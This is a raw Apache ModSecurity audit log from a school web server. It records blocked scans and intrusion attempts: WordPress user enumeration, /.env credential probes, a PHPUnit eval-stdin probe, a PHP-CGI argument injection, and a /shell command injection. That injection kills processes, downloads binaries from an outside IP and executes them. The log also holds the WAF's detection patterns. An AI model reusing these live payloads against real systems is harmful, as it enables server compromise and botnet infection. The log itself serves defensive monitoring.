type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466254128962 5222 (- - -) Stopwatch2: 1746466254128962 5222; combined=4266, p1=542, p2=3504, p3=32, p4=35, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --391a246e-Z-- --dead7410-A-- [06/May/2025:00:31:37 +0700] aBj1-QRwKNFSM6B7_LapswAAAI8 103.236.140.4 33430 103.236.140.4 8181 --dead7410-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dead7410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dead7410-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746466297139381 3009 (- - -) Stopwatch2: 1746466297139381 3009; combined=1265, p1=416, p2=820, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dead7410-Z-- --3f44f514-A-- [06/May/2025:00:31:40 +0700] aBj1_E2V_h1VFAgsfgaJ0QAAABM 103.236.140.4 33470 103.236.140.4 8181 --3f44f514-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f44f514-C-- demo.sayHello --3f44f514-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f44f514-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466300859427 5616 (- - -) Stopwatch2: 1746466300859427 5616; combined=4134, p1=515, p2=3394, p3=33, p4=35, p5=93, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f44f514-Z-- --629bdd2c-A-- [06/May/2025:00:53:17 +0700] aBj7DU2V_h1VFAgsfgaN1gAAAAI 103.236.140.4 43818 103.236.140.4 8181 --629bdd2c-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.146.57.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.146.57.183 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.31.0 Accept: */* Content-Type: application/x-www-form-urlencoded --629bdd2c-C-- --629bdd2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --629bdd2c-E-- --629bdd2c-H-- Message: Access denied with code 403 (phase 2). String match " --9035bf6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9035bf6f-E-- --9035bf6f-H-- Message: Access denied with code 403 (phase 2). String match " --a1feb553-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1feb553-E-- --a1feb553-H-- Message: Access denied with code 403 (phase 2). String match " --f29e1306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29e1306-H-- Message: Access denied with code 403 (phase 2). String match " --bfc22535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfc22535-E-- --bfc22535-H-- Message: Access denied with code 403 (phase 2). String match " --5fb3fe25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fb3fe25-E-- --5fb3fe25-H-- Message: Access denied with code 403 (phase 2). 
String match " --12bf0979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12bf0979-H-- Message: Access denied with code 403 (phase 2). String match " --c8d68f6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8d68f6a-E-- --c8d68f6a-H-- Message: Access denied with code 403 (phase 2). String match " --b5aa8f71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5aa8f71-E-- --b5aa8f71-H-- Message: Access denied with code 403 (phase 2). String match " --8584123e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8584123e-E-- --8584123e-H-- Message: Access denied with code 403 (phase 2). String match " --ab09bb1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab09bb1a-E-- --ab09bb1a-H-- Message: Access denied with code 403 (phase 2). String match " --ae43645d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae43645d-H-- Message: Access denied with code 403 (phase 2). String match " --e695127e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e695127e-E-- --e695127e-H-- Message: Access denied with code 403 (phase 2). String match " --aab46b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aab46b51-E-- --aab46b51-H-- Message: Access denied with code 403 (phase 2). String match " --7d7e221f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d7e221f-H-- Message: Access denied with code 403 (phase 2). 
String match " --4ce2ba5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ce2ba5d-E-- --4ce2ba5d-H-- Message: Access denied with code 403 (phase 2). String match " --32ee9f05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32ee9f05-E-- --32ee9f05-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746496374116818 5792 (- - -) Stopwatch2: 1746496374116818 5792; combined=4127, p1=530, p2=3543, p3=0, p4=0, p5=54, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32ee9f05-Z-- --9664cf2b-A-- [06/May/2025:10:35:23 +0700] aBmDezhugRYtrdwuywwLEwAAAIk 103.236.140.4 43568 103.236.140.4 8181 --9664cf2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi Y2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --9664cf2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9664cf2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746502523254016 791 (- - -) Stopwatch2: 1746502523254016 791; combined=363, p1=323, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9664cf2b-Z-- --0076f413-A-- [06/May/2025:11:21:45 +0700] aBmOWfXApPfVm9Q69EhXcgAAAMw 103.236.140.4 47578 103.236.140.4 8181 --0076f413-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --0076f413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0076f413-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746505305585319 757 (- - -) Stopwatch2: 1746505305585319 757; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0076f413-Z-- --a2a0a02a-A-- [06/May/2025:11:31:00 +0700] aBmQhEfy6a2jfN9asT6bHwAAABM 103.236.140.4 53078 103.236.140.4 8181 --a2a0a02a-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 143.244.168.161 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a2a0a02a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2a0a02a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746505860505529 826 (- - -) Stopwatch2: 1746505860505529 826; combined=323, p1=279, p2=0, p3=0, p4=0, p5=44, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2a0a02a-Z-- --f86a2952-A-- [06/May/2025:11:32:15 +0700] aBmQz_XApPfVm9Q69EhYyAAAAMk 103.236.140.4 53820 103.236.140.4 8181 --f86a2952-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 157.230.19.140 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f86a2952-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f86a2952-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746505935587599 712 (- - -) Stopwatch2: 1746505935587599 712; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f86a2952-Z-- --f7c2a46b-A-- [06/May/2025:12:19:52 +0700] aBmb-Efy6a2jfN9asT6j0QAAABE 103.236.140.4 54296 103.236.140.4 8181 --f7c2a46b-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f7c2a46b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7c2a46b-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746508792391863 890 (- - -) Stopwatch2: 1746508792391863 890; combined=332, p1=290, p2=0, p3=0, p4=0, p5=42, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7c2a46b-Z-- --82fcac39-A-- [06/May/2025:12:19:52 +0700] aBmb-Efy6a2jfN9asT6j0wAAABM 103.236.140.4 54300 103.236.140.4 8181 --82fcac39-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --82fcac39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82fcac39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746508792435940 708 (- - -) Stopwatch2: 1746508792435940 708; combined=261, p1=229, p2=0, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82fcac39-Z-- --067df944-A-- [06/May/2025:14:22:51 +0700] aBm4y_XApPfVm9Q69EhyvAAAAMI 103.236.140.4 49630 103.236.140.4 8181 --067df944-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --067df944-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --067df944-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746516171606104 835 (- - -) Stopwatch2: 1746516171606104 835; combined=389, p1=346, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --067df944-Z-- --e5494605-A-- [06/May/2025:14:38:54 +0700] aBm8jkfy6a2jfN9asT7AxQAAABE 103.236.140.4 39072 103.236.140.4 8181 --e5494605-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --e5494605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5494605-E-- --e5494605-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746517134478953 2878 (- - -) Stopwatch2: 1746517134478953 2878; combined=904, p1=538, p2=322, p3=0, p4=0, p5=44, sr=103, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5494605-Z-- --9bc95a7e-A-- [06/May/2025:14:58:39 +0700] aBnBL_XApPfVm9Q69Eh6pQAAAMQ 103.236.140.4 48438 103.236.140.4 8181 --9bc95a7e-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --9bc95a7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bc95a7e-E-- --9bc95a7e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746518319380910 2613 (- - -) Stopwatch2: 1746518319380910 2613; combined=915, p1=480, p2=387, p3=0, p4=0, p5=47, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bc95a7e-Z-- --9d910c08-A-- [06/May/2025:15:18:18 +0700] aBnFykfy6a2jfN9asT7D8gAAABU 103.236.140.4 49750 103.236.140.4 8181 --9d910c08-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.67.143 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --9d910c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d910c08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746519498503436 1044 (- - -) Stopwatch2: 1746519498503436 1044; combined=421, p1=378, p2=0, p3=0, p4=0, p5=42, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d910c08-Z-- --3002267e-A-- [06/May/2025:15:45:08 +0700] aBnMFDhugRYtrdwuyww64gAAAI4 103.236.140.4 49914 103.236.140.4 8181 --3002267e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3002267e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3002267e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746521108210491 834 (- - -) Stopwatch2: 1746521108210491 834; combined=356, p1=309, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
